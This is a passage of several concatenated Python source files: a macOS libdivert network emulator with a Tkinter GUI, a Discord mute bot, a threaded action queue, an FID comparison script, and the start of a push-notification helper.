arr_type(*list(duplicate_rate)),
max_duplicate)
class ThrottlePipe(BasicPipe):
def __init__(self, t_start, t_end, queue_size, ip_filter_obj=None, size_filter_obj=None):
super(ThrottlePipe, self).__init__()
# first set function signature
setattr(getattr(self._lib, 'throttle_pipe_create'), "argtypes",
[c_void_p, c_void_p, c_size_t, POINTER(c_float), POINTER(c_float), c_size_t])
setattr(getattr(self._lib, 'throttle_pipe_create'), "restype", c_void_p)
arr_len = len(t_start)
arr_type = c_float * arr_len
# then check packet size filter handle
ip_filter_handle = None if ip_filter_obj is None else ip_filter_obj.handle
size_filter_handle = None if size_filter_obj is None else size_filter_obj.handle
self.handle = self._lib.throttle_pipe_create(ip_filter_handle, size_filter_handle,
arr_len, arr_type(*list(t_start)),
arr_type(*list(t_end)),
queue_size)
class Emulator(object):
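    # Thin ctypes wrapper around libdivert's emulator API: it owns a divert handle
    # and an emulator config, runs the divert loop on a background thread, and is
    # configured through add_pipe()/add_pid()/set_device()/set_dump() before start().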
libdivert_ref = None
emulator_argtypes = {
'emulator_callback': [c_void_p, c_void_p, c_char_p, c_char_p],
'emulator_create_config': [c_void_p],
'emulator_destroy_config': [c_void_p],
'emulator_flush': [c_void_p],
'emulator_add_pipe': [c_void_p, c_void_p, c_int],
'emulator_del_pipe': [c_void_p, c_void_p, c_int],
'emulator_add_flag': [c_void_p, c_uint64],
'emulator_clear_flags': [c_void_p],
'emulator_clear_flag': [c_void_p, c_uint64],
'emulator_set_dump_pcap': [c_void_p, c_char_p],
'emulator_set_pid_list': [c_void_p, POINTER(c_int32), c_ssize_t],
'emulator_config_check': [c_void_p, c_char_p],
'emulator_is_running': [c_void_p],
'emulator_data_size': [c_void_p, c_int],
'emulator_create_ip_filter': [c_char_p, c_char_p, c_char_p, c_char_p, c_int, c_int],
'emulator_create_size_filter': [c_size_t, POINTER(c_size_t), POINTER(c_float)],
}
emulator_restypes = {
'emulator_callback': None,
'emulator_create_config': c_void_p,
'emulator_destroy_config': None,
'emulator_flush': None,
'emulator_add_pipe': c_int,
'emulator_del_pipe': c_int,
'emulator_add_flag': None,
'emulator_clear_flags': None,
'emulator_clear_flag': None,
'emulator_set_dump_pcap': None,
'emulator_set_pid_list': None,
'emulator_config_check': c_int,
'emulator_is_running': c_int,
'emulator_data_size': c_uint64,
'emulator_create_ip_filter': c_void_p,
'emulator_create_size_filter': c_void_p,
}
class PacketIPFilter(object):
def __init__(self, ip_src, ip_src_mask, ip_dst,
ip_dst_mask, port_src, port_dst):
lib = Emulator.libdivert_ref
self.handle = lib.emulator_create_ip_filter(ip_src, ip_src_mask, ip_dst,
ip_dst_mask, port_src, port_dst)
class PacketSizeFilter(object):
def __init__(self, size_arr, rate_arr):
if len(size_arr) != len(rate_arr):
raise RuntimeError('Invalid packet size filter')
arr_len = len(size_arr)
lib = Emulator.libdivert_ref
self.handle = lib.emulator_create_size_filter(len(size_arr),
(c_size_t * arr_len)(*size_arr),
(c_float * arr_len)(*rate_arr))
def __init__(self):
# get reference for libdivert
if Emulator.libdivert_ref is None:
lib_obj = MacDivert()
Emulator.libdivert_ref = lib_obj.get_reference()
# initialize prototype of functions
self._init_func_proto()
# create divert handle and emulator config
self.handle, self.config = self._create_config()
# background thread for divert loop
self.thread = None
# list to store pids
self.pid_list = []
# error information
self.errmsg = create_string_buffer(Defaults.DIVERT_ERRBUF_SIZE)
self.quit_loop = False
self.is_waiting = False
def __del__(self):
lib = self.libdivert_ref
lib.emulator_destroy_config(self.config)
if lib.divert_close(self.handle) != 0:
raise RuntimeError('Divert handle could not be cleaned.')
def _init_func_proto(self):
# set the types of parameters
for func_name, argtypes in self.emulator_argtypes.items():
# first check if function exists
if not hasattr(self.libdivert_ref, func_name):
raise RuntimeError("Not a valid libdivert library")
setattr(getattr(self.libdivert_ref, func_name), "argtypes", argtypes)
# set the types of return value
for func_name, restype in self.emulator_restypes.items():
setattr(getattr(self.libdivert_ref, func_name), "restype", restype)
def _create_config(self):
lib = self.libdivert_ref
# create divert handle
divert_handle = lib.divert_create(0, 0)
if not divert_handle:
raise RuntimeError('Fail to create divert handle.')
# create config handle
config = lib.emulator_create_config(divert_handle,
Flags.EMULALTOR_BUF_SIZE)
if not config:
raise RuntimeError('Fail to create emulator configuration')
# set callback function and callback data for divert handle
if lib.divert_set_callback(divert_handle,
lib.emulator_callback,
config) != 0:
raise RuntimeError(divert_handle.errmsg)
# activate divert handle
if lib.divert_activate(divert_handle) != 0:
raise RuntimeError(divert_handle.errmsg)
return divert_handle, config
def _divert_loop(self, filter_str):
# first add all PIDs into list
self._wait_pid()
if self.quit_loop:
self.quit_loop = False
return
lib = self.libdivert_ref
lib.divert_loop(self.handle, -1)
def _divert_loop_stop(self):
lib = self.libdivert_ref
lib.divert_loop_stop(self.handle)
lib.divert_loop_wait(self.handle)
print 'Emulator stop OK'
lib.emulator_flush(self.config)
print 'Emulator flush OK'
def add_pipe(self, pipe, direction=Flags.DIRECTION_IN):
lib = self.libdivert_ref
if lib.emulator_add_pipe(self.config, pipe.handle, direction) != 0:
raise RuntimeError("Pipe already exists.")
def del_pipe(self, pipe, free_mem=False):
lib = self.libdivert_ref
if lib.emulator_del_pipe(self.config, pipe.handle, int(free_mem)) != 0:
raise RuntimeError("Pipe do not exists.")
def add_pid(self, pid):
self.pid_list.append(pid)
def set_device(self, dev_name):
lib = self.libdivert_ref
if lib.divert_set_device(self.handle, dev_name) != 0:
raise RuntimeError('Could not set capture device.')
def _wait_pid(self):
# first wait until all processes are started
proc_list = filter(lambda x: isinstance(x, str) or isinstance(x, unicode), self.pid_list)
real_pid_list = filter(lambda x: isinstance(x, int), self.pid_list)
self.is_waiting = True
while not self.quit_loop:
if len(real_pid_list) == len(self.pid_list):
break
for proc in psutil.process_iter():
proc_name = proc.name().lower()
for name in proc_list:
if name.lower() in proc_name:
real_pid_list.append(proc.pid)
print 'Waiting for process: %s' % ', '.join(proc_list)
time.sleep(0.2)
self.is_waiting = False
if self.quit_loop:
return
print 'Found PID: %s' % ', '.join(map(str, real_pid_list))
lib = self.libdivert_ref
arr_len = len(real_pid_list)
arr_type = c_int32 * arr_len
lib.emulator_set_pid_list(self.config, arr_type(*real_pid_list), arr_len)
def set_dump(self, directory):
lib = self.libdivert_ref
        if not os.path.isdir(directory):
raise RuntimeError('Invalid save position.')
lib.emulator_set_dump_pcap(self.config, directory)
def start(self, filter_str=''):
# first check the config
lib = self.libdivert_ref
if lib.emulator_config_check(self.config, self.errmsg) != 0:
raise RuntimeError('Invalid configuration:\n%s' % self.errmsg.value)
print 'Config check OK'
# then apply filter string
if filter_str:
if lib.divert_update_ipfw(self.handle, filter_str) != 0:
raise RuntimeError(self.handle.errmsg)
# start a new thread to run emulator
self.thread = threading.Thread(target=self._divert_loop, args=(filter_str,))
self.thread.start()
def stop(self):
# if emulator is waiting on PIDs
# then just use a quit loop flag
if self.is_waiting:
self.quit_loop = True
else:
self._divert_loop_stop()
self.thread.join(timeout=1.0)
if self.thread.isAlive():
raise RuntimeError('Divert loop failed to stop.')
self.thread = None
@property
def is_looping(self):
return self.thread is not None and self.thread.isAlive()
def data_size(self, direction):
lib = self.libdivert_ref
return lib.emulator_data_size(self.config, direction)
class EmulatorGUI(object):
LOCAL_MODE = 0
ROUTER_MODE = 1
prompt_str = 'PID / comma separated process name'
default_device = 'bridge100'
kext_errmsg = """
Kernel extension load failed.
Please check if you have root privilege on your Mac.
Since we do not have a valid developer certificate,
you should manually disable the kernel extension protection.
For Mac OS X 10.11:
1. Start your computer from recovery mode: restart your Mac
and hold down the Command and R keys at startup.
2. Run "csrutil enable --without kext" under recovery mode.
3. Reboot.
For Mac OS X 10.10:
1. Run "sudo nvram boot-args=kext-dev-mode=1" from terminal.
2. Reboot.
"""
pipe_name2type = {
'drop': DropPipe,
'delay': DelayPipe,
'biterr': BiterrPipe,
'disorder': DisorderPipe,
'throttle': ThrottlePipe,
'duplicate': DuplicatePipe,
'bandwidth': BandwidthPipe,
}
def exit_func(self):
if self.emulator is not None:
try:
self.emulator.stop()
self.emulator = None
except Exception as e:
print e.message
self._flush_ipfw()
self.master.quit()
self.master.destroy()
def _flush_ipfw(self):
if Emulator.libdivert_ref is not None:
buf = create_string_buffer(256)
lib = Emulator.libdivert_ref
lib.ipfw_flush(buf)
def decide_iface(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com", 80))
local_ip = s.getsockname()[0]
s.close()
except:
showwarning('Network Error',
('Your host machine may not have a valid network connection.\n'
'You should **manually** choose your network device name in filter rule.'))
return
iface_lst = netifaces.interfaces()
for iface in iface_lst:
addrs = netifaces.ifaddresses(iface)
if netifaces.AF_INET in addrs:
addr_dict = addrs[netifaces.AF_INET][0]
if 'addr' in addr_dict:
if addr_dict['addr'] == local_ip:
print 'Found activate network interface: %s' % iface
self.iface = iface
return
def __init__(self, master):
self.master = master
self.emulator = None
self.conf_dict = {}
self.conf_name = tk.StringVar()
self.conf_frame = None
master.title("Wireless Network Reproduction")
master.protocol("WM_DELETE_WINDOW", self.exit_func)
# first check root privilege
if os.getuid() != 0:
self.master.withdraw()
showerror('Privilege Error', 'You should run this program as root.')
self.master.destroy()
return
# then find the current activate network interface
self.iface = '<network device name>'
self.decide_iface()
self.default_rule = 'ip from any to any via %s' % self.iface
self.inbound_list = []
self.outbound_list = []
self.filter_str = tk.StringVar(value=self.default_rule)
self.proc_str = tk.StringVar(value=self.prompt_str)
self.dev_str = tk.StringVar()
self.dump_pos = tk.StringVar()
self.divert_unknown = tk.IntVar(value=1)
self.start_btn = None
self.filter_entry = None
self.proc_entry = None
self.dev_entry = None
        self.mode = tk.IntVar(value=self.LOCAL_MODE)
self.init_GUI()
try:
Emulator()
except OSError:
def close_func():
self.master.quit()
self.master.destroy()
self.master.withdraw()
top = tk.Toplevel(self.master)
top.title('Kernel Extension Error')
tk.Message(top, text=self.kext_errmsg)\
.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
tk.Button(top, text="Close", command=close_func).pack(side=tk.TOP)
top.protocol("WM_DELETE_WINDOW", close_func)
except Exception as e:
self.master.withdraw()
showerror('Emulator Loading Error', e.message)
self.master.destroy()
def init_GUI(self):
new_frame = tk.Frame(master=self.master)
tk.Button(master=new_frame, text='Add Configuration',
command=self.load_data_file).pack(side=tk.LEFT)
self.conf_frame = tk.Frame(master=new_frame)
self.conf_frame.pack(side=tk.RIGHT, fill=tk.X, expand=True)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Dump .pcap to').pack(side=tk.LEFT)
tk.Entry(master=new_frame, textvariable=self.dump_pos)\
.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
tk.Button(master=new_frame, text='Select',
command=self.load_dump_pos).pack(side=tk.LEFT)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Filter Rule').pack(side=tk.LEFT)
self.filter_entry = tk.Entry(master=new_frame, textvariable=self.filter_str, font='Monaco')
self.filter_entry.pack(side=tk.LEFT, fill=tk.X, expand=True)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Process List').pack(side=tk.LEFT)
self.proc_entry = tk.Entry(master=new_frame, textvariable=self.proc_str,
font='Monaco', width=len(self.proc_str.get()))
self.proc_entry.pack(side=tk.LEFT, fill=tk.X, expand=True)
tk.Label(master=new_frame, text='unknown').pack(side=tk.LEFT)
tk.Checkbutton(master=new_frame, variable=self.divert_unknown).pack(side=tk.LEFT)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Mode').pack(side=tk.LEFT)
tk.Radiobutton(master=new_frame, text="Local", variable=self.mode,
value=0, command=self._switch_mode).pack(side=tk.LEFT)
tk.Radiobutton(master=new_frame, text="WiFi", variable=self.mode,
value=1, command=self._switch_mode).pack(side=tk.LEFT)
self.dev_entry = tk.Entry(master=new_frame, textvariable=self.dev_str,
state=tk.DISABLED, font='Monaco', width=12)
self.dev_entry.pack(side=tk.LEFT)
tk.Button(master=new_frame, text='Fix network',
command=self._flush_ipfw).pack(side=tk.LEFT)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
self.start_btn = tk.Button(master=new_frame, text='Start',
command=self.start, font=('Monaco', 20))
self.start_btn.pack(side=tk.TOP)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
def _switch_mode(self):
if self.mode.get() == self.LOCAL_MODE:
# local mode
self.dev_str.set('')
self.dev_entry.config(state=tk.DISABLED)
self.filter_entry.config(state=tk.NORMAL)
self.proc_entry.config(state=tk.NORMAL)
self.filter_str.set(self.default_rule)
self.proc_str.set(self.prompt_str)
elif self.mode.get() == self.ROUTER_MODE:
self.dev_entry.config(state=tk.NORMAL)
self.dev_str.set(self.default_device)
self.filter_str.set('ip from any to any')
self.proc_str.set('')
self.filter_entry.config(state=tk.DISABLED)
self.proc_entry.config(state=tk.DISABLED)
else:
raise RuntimeError('Unknown Mode!')
def load_data_file(self):
dir_name, file_name = os.path.split(__file__)
dir_name = os.path.join(dir_name, 'examples')
file_path = askopenfilename(title='Choose .json file', initialdir=dir_name)
if file_path and os.path.isfile(file_path):
try:
_, fname = os.path.split(file_path)
with open(file_path, 'r') as fid:
data = fid.read()
self.conf_dict[file_path] = json.loads(data)
fname_sec = fname.split('.')
if len(fname_sec) > 1:
fname = '.'.join(fname_sec[:-1])
tk.Radiobutton(self.conf_frame, text=fname,
variable=self.conf_name,
value=file_path).pack(side=tk.LEFT)
self.conf_name.set(file_path)
except Exception as e:
showerror(title='Open file',
message='Unable to load json: %s' % e.message)
def load_dump_pos(self):
dir_name, file_name = os.path.split(__file__)
dir_name = os.path.join(dir_name, 'examples')
dir_path = askdirectory(title='Choose dump position',
initialdir=dir_name)
self.dump_pos.set(dir_path)
def start(self):
if self.conf_name.get() not in self.conf_dict:
showerror(title='Configuration Error',
message='No available conf file.')
return
if self.proc_str.get() == self.prompt_str:
showerror(title='Process/PID Error',
message='You should set legal PIDs or leave it blank.')
return
if self.emulator is None:
try:
self.emulator = Emulator()
self._load_config()
self.emulator.start(self.filter_str.get())
self.start_btn.config(text='Stop')
except Exception as e:
self.emulator = None
showerror(title='Runtime error',
message='Unable to start emulator:\n%s' % e.message)
else:
try:
self.emulator.stop()
self.emulator = None
self.start_btn.config(text='Start')
except Exception as e:
self.emulator = None
showerror(title='Runtime error',
message='Unable to stop emulator:\n%s' % e.message)
def _load_config(self):
if self.emulator is None:
return
# set dump position
dump_path = self.dump_pos.get()
if dump_path and os.path.isdir(dump_path):
self.emulator.set_dump(dump_path)
# set emulation device
dev_name = self.dev_str.get()
if dev_name:
self.emulator.set_device(dev_name)
# set pid list if not empty
if self.mode.get() == self.LOCAL_MODE:
pid_str = self.proc_str.get().strip()
if pid_str and pid_str != self.prompt_str:
if self.divert_unknown.get():
self.emulator.add_pid(-1)
for pid in map(lambda x: x.strip(), pid_str.split(',')):
try:
pid_int = int(pid)
self.emulator.add_pid(pid_int)
except:
self.emulator.add_pid(pid)
elif self.mode.get() == self.ROUTER_MODE:
# this is a fake PID, nothing would match
self.emulator.add_pid(-2)
else:
raise RuntimeError("Unknown Mode!")
# finally load all pipes
for pipe in copy.deepcopy(self.conf_dict[self.conf_name.get()]):
if not isinstance(pipe, dict):
raise TypeError('Invalid configuration')
pipe_name = pipe.pop('pipe', None)
if not pipe_name:
raise RuntimeError('Configuration do not have pipe type')
direction = pipe.pop('direction', None)
if not direction:
raise RuntimeError('Configuration do not have direction field')
if direction == "out":
dir_flag = Flags.DIRECTION_OUT
elif direction == "in":
dir_flag = Flags.DIRECTION_IN
else:
raise RuntimeError('Unknown direction flag')
ip_filter = self._create_ip_filter(pipe.pop('ip_filter', None))
size_filter = self._create_size_filter(pipe.pop('size_filter', None))
try:
pipe_type = self.pipe_name2type[pipe_name.lower()]
except:
raise RuntimeError('Invalid pipe type')
pipe_obj = pipe_type(ip_filter_obj=ip_filter,
size_filter_obj=size_filter, **pipe)
self.emulator.add_pipe(pipe_obj, dir_flag)
def _create_size_filter(self, filter_dict):
if not filter_dict:
return None
size_arr = filter_dict['size']
rate_arr = filter_dict['rate']
return Emulator.PacketSizeFilter(size_arr, rate_arr)
def _create_ip_filter(self, filter_dict):
if not filter_dict:
return None
src_str = filter_dict['src']
dst_str = filter_dict['dst']
strip_func = lambda x: x.strip()
src_addr, port_src = map(strip_func, src_str.split(':'))
src_addr, src_mask = map(strip_func, src_addr.split('/'))
dst_addr, port_dst = map(strip_func, dst_str.split(':'))
dst_addr, dst_mask = map(strip_func, dst_addr.split('/'))
return Emulator.PacketIPFilter(src_addr, src_mask,
dst_addr, dst_mask,
int(port_src), int(port_dst))
def mainloop(self):
self.master.mainloop()
if __name__ == '__main__':
pid_num = 0
try:
pid_num = int(sys.argv[1])
except Exception as e:
print 'Exception: %s' % e.message
print 'Usage: python emulator.py <PID>'
exit(-1)
emulator = Emulator()
emulator.add_pid(pid_num)
emulator.add_pid(-1)
emulator.set_dump('/Users/baidu/Downloads')
emulator.add_pipe(DelayPipe([0, 10], [0.1, 0.6], 1024), Flags.DIRECTION_IN)
is_looping = True
# register signal handler
def sig_handler(signum, frame):
print 'Catch signal: %d' % signum
global is_looping
is_looping = False
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTSTP, sig_handler)
perMB = 1024 * 1024
trans_size = 0
# start loop
emulator.start('ip from any to any via en0')
while is_looping:
data_size = emulator.data_size(Flags.DIRECTION_IN)
if data_size > 5 * perMB:
print 'Finish'
break
if data_size > (trans_size + 1) * perMB:
trans_size = data_size / perMB
print 'Transfer %d MB data.' % trans_size
time.sleep(0.5)
# stop loop
emulator.stop()
print 'Program exited.'
|
Bot.py
|
import threading
import discord
from discord.ext import commands
from discord.ext.commands.core import has_permissions
from discord import *
import os,json
import time as times
import requests
#MODIFY DATA
PREFIX="YOUR PREFIX HERE"
TOKEN="YOUR TOKEN HERE"
intents=discord.Intents.all()
client=commands.Bot(command_prefix=PREFIX,intents=intents)
client.token=TOKEN
client.api="https://discord.com/api/v8"
if not os.path.isfile("scheduledmute.json"):
with open("scheduledmute.json","w") as f:
json.dump({"mutes":[],"roles":[]},f,indent=4)
@client.event
async def on_ready():
print(f"Online als {client.user}")
def check_events():
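    # Background worker: once per second, reload scheduledmute.json and, for every
    # scheduled unmute whose timestamp has passed, remove all registered mute roles
    # from that member through the raw Discord REST API.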
while True:
with open("scheduledmute.json","r") as f:
xd=json.load(f)
        for a in list(xd["mutes"]):
            if int(a[1]) <= times.time():
                xd["mutes"].remove(a)
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
if a[0] == "unmute":
headers={
"authorization":f"Bot {client.token}"
}
                    for role_id in xd["roles"]:
                        requests.delete(f"{client.api}/guilds/920739361304244264/members/{a[2]}/roles/{role_id}",headers=headers)
times.sleep(1)
def convert(time):
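    # Convert a shorthand duration such as "30s", "10m" or "2h" into seconds;
    # returns -1 for an unknown unit suffix and -2 if the numeric part is not an integer.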
pos = ["s","m","h","d","w"]
time_dict = {"s" : 1, "m" : 60, "h" : 3600 , "d" : 3600*24, "w": 3600*24*7}
unit = time[-1].lower()
if unit not in pos:
return -1
try:
val = int(time[:-1])
except:
return -2
return val * time_dict[unit]
@client.event
async def on_command_error(ctx,error):
if not isinstance(error,commands.CommandNotFound):
embed=discord.Embed(description=str(error).capitalize(),color=discord.Colour.red())
await ctx.send(embed=embed)
@client.event
async def on_message(message):
if message.author.bot:
return
await client.process_commands(message)
@client.command()
@has_permissions(kick_members=True)
async def mute(ctx,member:discord.Member,*,time):
time=convert(time)
    if time==-1:
        raise commands.BadArgument("Possible Declarations: `s` second `m` minute `h` hour `d` day `w` week\nPlease separate the individual declarations with a /")
    elif time==-2:
        raise commands.BadArgument("Please separate the individual declarations with a /")
with open("scheduledmute.json","r") as f:
xd=json.load(f)
added=False
for a in xd["roles"]:
try:
role=ctx.guild.get_role(a)
await member.add_roles(role)
except:
pass
else:
added=True
if added==False:
return await ctx.send(embed=discord.Embed(description=f"There is no Muted Role, you can create one `{PREFIX}create_mute_role`",color=discord.Colour.red()))
    entry=["unmute",times.time()+time,member.id]
with open("scheduledmute.json","r") as f:
xd=json.load(f)
    xd["mutes"].append(entry)
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
embed=discord.Embed(description=f"{member.mention} was muted for {time} seconds.",color=discord.Colour.green())
await ctx.send(embed=embed)
@client.command()
@has_permissions(kick_members=True)
async def unmute(ctx,member:discord.Member):
with open("scheduledmute.json","r") as f:
xd=json.load(f)
for a in xd["mutes"]:
if a[0]=="unmute" and a[2]==member.id:
            a[1]=times.time()
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
embed=discord.Embed(description=f"{member.mention} was unmuted.",color=discord.Colour.green())
await ctx.send(embed=embed)
@client.command()
@has_permissions(manage_guild=True)
async def create_mute_role(ctx):
    role=await ctx.guild.create_role(name="Muted")
for channel in ctx.guild.channels:
if isinstance(channel,discord.TextChannel):
await channel.set_permissions(role,send_messages=False)
elif isinstance(channel,discord.VoiceChannel):
await channel.set_permissions(role,connect=False)
with open("scheduledmute.json","r") as f:
xd=json.load(f)
xd["roles"].append(role.id)
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
t1=threading.Thread(target=check_events)
t1.start()
client.run(client.token)
|
action.py
|
import threading
from time import sleep
class ActionQueue(object):
IDLE = "idle"
RUNNING = "running"
STOPPED = "stopped"
def __init__(self, parent):
self.parent = parent
self.queue = []
def make_thread_fnc(self):
def thread_fnc():
i = 0
            while self.parent.running and self.parent.state != ActionQueue.STOPPED:
if self.parent.state == ActionQueue.RUNNING and self.len > 0:
curr_action = self.remove()
if curr_action is not None:
curr_action()
sleep(0.25)
return thread_fnc
def run(self):
self.t = threading.Thread(target=self.make_thread_fnc())
self.t.start()
@property
def len(self):
return len(self.queue)
def add(self, action):
self.queue.append(action)
def remove(self):
if self.len == 0:
return None
top = self.queue[0]
if self.len <= 1:
self.queue = []
else:
self.queue = self.queue[1:]
return top
def clear(self):
self.queue = []
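# A minimal usage sketch (assumes a hypothetical parent object exposing `running` and `state` attributes):
#   queue = ActionQueue(parent)
#   queue.add(lambda: print("hello"))
#   queue.run()  # the worker thread drains queued callables while parent.state == ActionQueue.RUNNING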
|
compute_FIDs.py
|
#!/usr/bin/env python3
"""
Computes the FID between different datasets. You need an executable script that takes the paths to two datasets and
computes the FID from them. Example: https://github.com/mseitzer/pytorch-fid/blob/master/fid_score.py
"""
import subprocess
import threading
NUM_THREADS = 8
def main():
comparisons = []
sets = [
["original/blue", "original/red", "original/green", "original/b_white", "original/m_white", "original/l_white"],
["20_sib_cropped/blue", "20_sib_cropped/red", "20_sib_cropped/green", "20_sib_cropped/b_white", "20_sib_cropped/m_white", "20_sib_cropped/l_white"],
["style3/blue", "style3/red", "style3/green", "style3/b_white", "style3/m_white", "style3/l_white"],
["pix2pix/blue", "pix2pix/red", "pix2pix/green", "pix2pix/b_white", "pix2pix/m_white", "pix2pix/l_white"]
]
    for group in sets:
        for idx_s in range(len(group)):
            for idx_t in range(idx_s + 1, len(group)):
                comparisons.append((group[idx_s], group[idx_t]))
datapath = "/home/dwalder/dataspace/fid/"
    executable = "./fid_score.py"
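    # Each comparison shells out to the FID script as: <executable> <datapath>/<set1> <datapath>/<set2>; both paths above are environment-specific.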
def get_comparison():
if comparisons:
return comparisons.pop()
else:
return None
lock = threading.Lock()
def compute_fid():
while True:
lock.acquire(blocking=True)
try:
comp = get_comparison()
if comp is None:
break
set1, set2 = comp
finally:
lock.release()
            ret = subprocess.run([executable, datapath + set1, datapath + set2], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True)
msg = ""
if ret.returncode:
msg = "{} exited with code {}:\n{}".format(ret.args, ret.returncode, ret.stdout)
out = str(ret.stdout).split()
try:
fid = float(out[-1][:4])
except ValueError as e:
msg = "Could not read out FID score for {} vs {}:\nout: {}\nerr: {}".format(set1, set2, ret.stdout, e)
if not msg:
msg = "{} vs {}: {}".format(set1, set2, fid)
lock.acquire(blocking=True)
try:
print(msg)
finally:
lock.release()
threads = []
for _ in range(NUM_THREADS):
thread = threading.Thread(target=compute_fid)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
|
sendNotify.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/10/31
# @Author : Oreomeow
# @Modify : MashiroF
# @File : sendNotify.py
# @Software: PyCharm
import base64
import hashlib
import hmac
import json
import os
import re
import sys
import threading
import time
import urllib.parse
import requests
# Keep a reference to the original print function and a lock shared across threads
_print = print
mutex = threading.Lock()
# Define a thread-safe replacement for print
def print(text, *args, **kw):
"""
    Keep output ordered so that messages printed from multiple threads do not interleave.
"""
with mutex:
_print(text, *args, **kw)
# Notification services
# fmt: off
push_config = {
    'HITOKOTO': False,  # enable Hitokoto (append a random quote)
    'BARK_PUSH': '',  # bark IP or device key, e.g. https://api.day.app/DxHcxxxxxRxxxxxxcm/
    'BARK_ARCHIVE': '',  # whether bark pushes are archived
    'BARK_GROUP': '',  # bark push group
    'BARK_SOUND': '',  # bark push sound
    'CONSOLE': False,  # print to the console
    'DD_BOT_SECRET': '',  # DingTalk bot DD_BOT_SECRET
    'DD_BOT_TOKEN': '',  # DingTalk bot DD_BOT_TOKEN
    'FSKEY': '',  # Feishu bot FSKEY
    'GOBOT_URL': '',  # go-cqhttp
    # push to a personal QQ: http://127.0.0.1/send_private_msg
    # push to a group:       http://127.0.0.1/send_group_msg
    'GOBOT_QQ': '',  # go-cqhttp target group or user
    # when GOBOT_URL ends with /send_private_msg, set user_id=<personal QQ>
    # when it ends with /send_group_msg, set group_id=<QQ group>
    'GOBOT_TOKEN': '',  # go-cqhttp access_token
    'IGOT_PUSH_KEY': '',  # iGot aggregated-push IGOT_PUSH_KEY
    'PUSH_KEY': '',  # ServerChan PUSH_KEY, compatible with both the legacy and Turbo versions
    'PUSH_PLUS_TOKEN': '',  # push+ WeChat push user token
    'PUSH_PLUS_USER': '',  # push+ WeChat push group code
    'QMSG_KEY': '',  # Qmsg QMSG_KEY
    'QMSG_TYPE': '',  # Qmsg QMSG_TYPE
    'QYWX_AM': '',  # WeCom (WeChat Work) application
    'QYWX_KEY': '',  # WeCom (WeChat Work) group bot
    'TG_BOT_TOKEN': '',  # Telegram bot TG_BOT_TOKEN, e.g. 1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
    'TG_USER_ID': '',  # Telegram bot TG_USER_ID, e.g. 1434078534
    'TG_API_HOST': '',  # Telegram proxy API host
    'TG_PROXY_AUTH': '',  # Telegram proxy auth parameters
    'TG_PROXY_HOST': '',  # Telegram proxy TG_PROXY_HOST
    'TG_PROXY_PORT': '',  # Telegram proxy TG_PROXY_PORT
}
notify_function = []
# Environment variables take precedence over the values configured in this file
for key in push_config:
if os.getenv(key):
value = os.getenv(key)
push_config[key] = value
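# Example: exporting PUSH_PLUS_TOKEN in the environment overrides the empty default above (the actual token value is user-specific).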
######################################## push method definitions #############################################
def bark(title: str, content: str) -> None:
"""
    Push a message via bark.
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
    Push a message to the console.
"""
print(f"{title}\n\n{content}")
def dingding_bot(title: str, content: str) -> None:
"""
    Push a message via the DingTalk bot.
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
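    # DingTalk secured webhooks are signed below with HMAC-SHA256 over "<timestamp>\n<secret>",
    # base64-encoded and URL-quoted, then passed as the `sign` query parameter.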
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
    url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}&timestamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
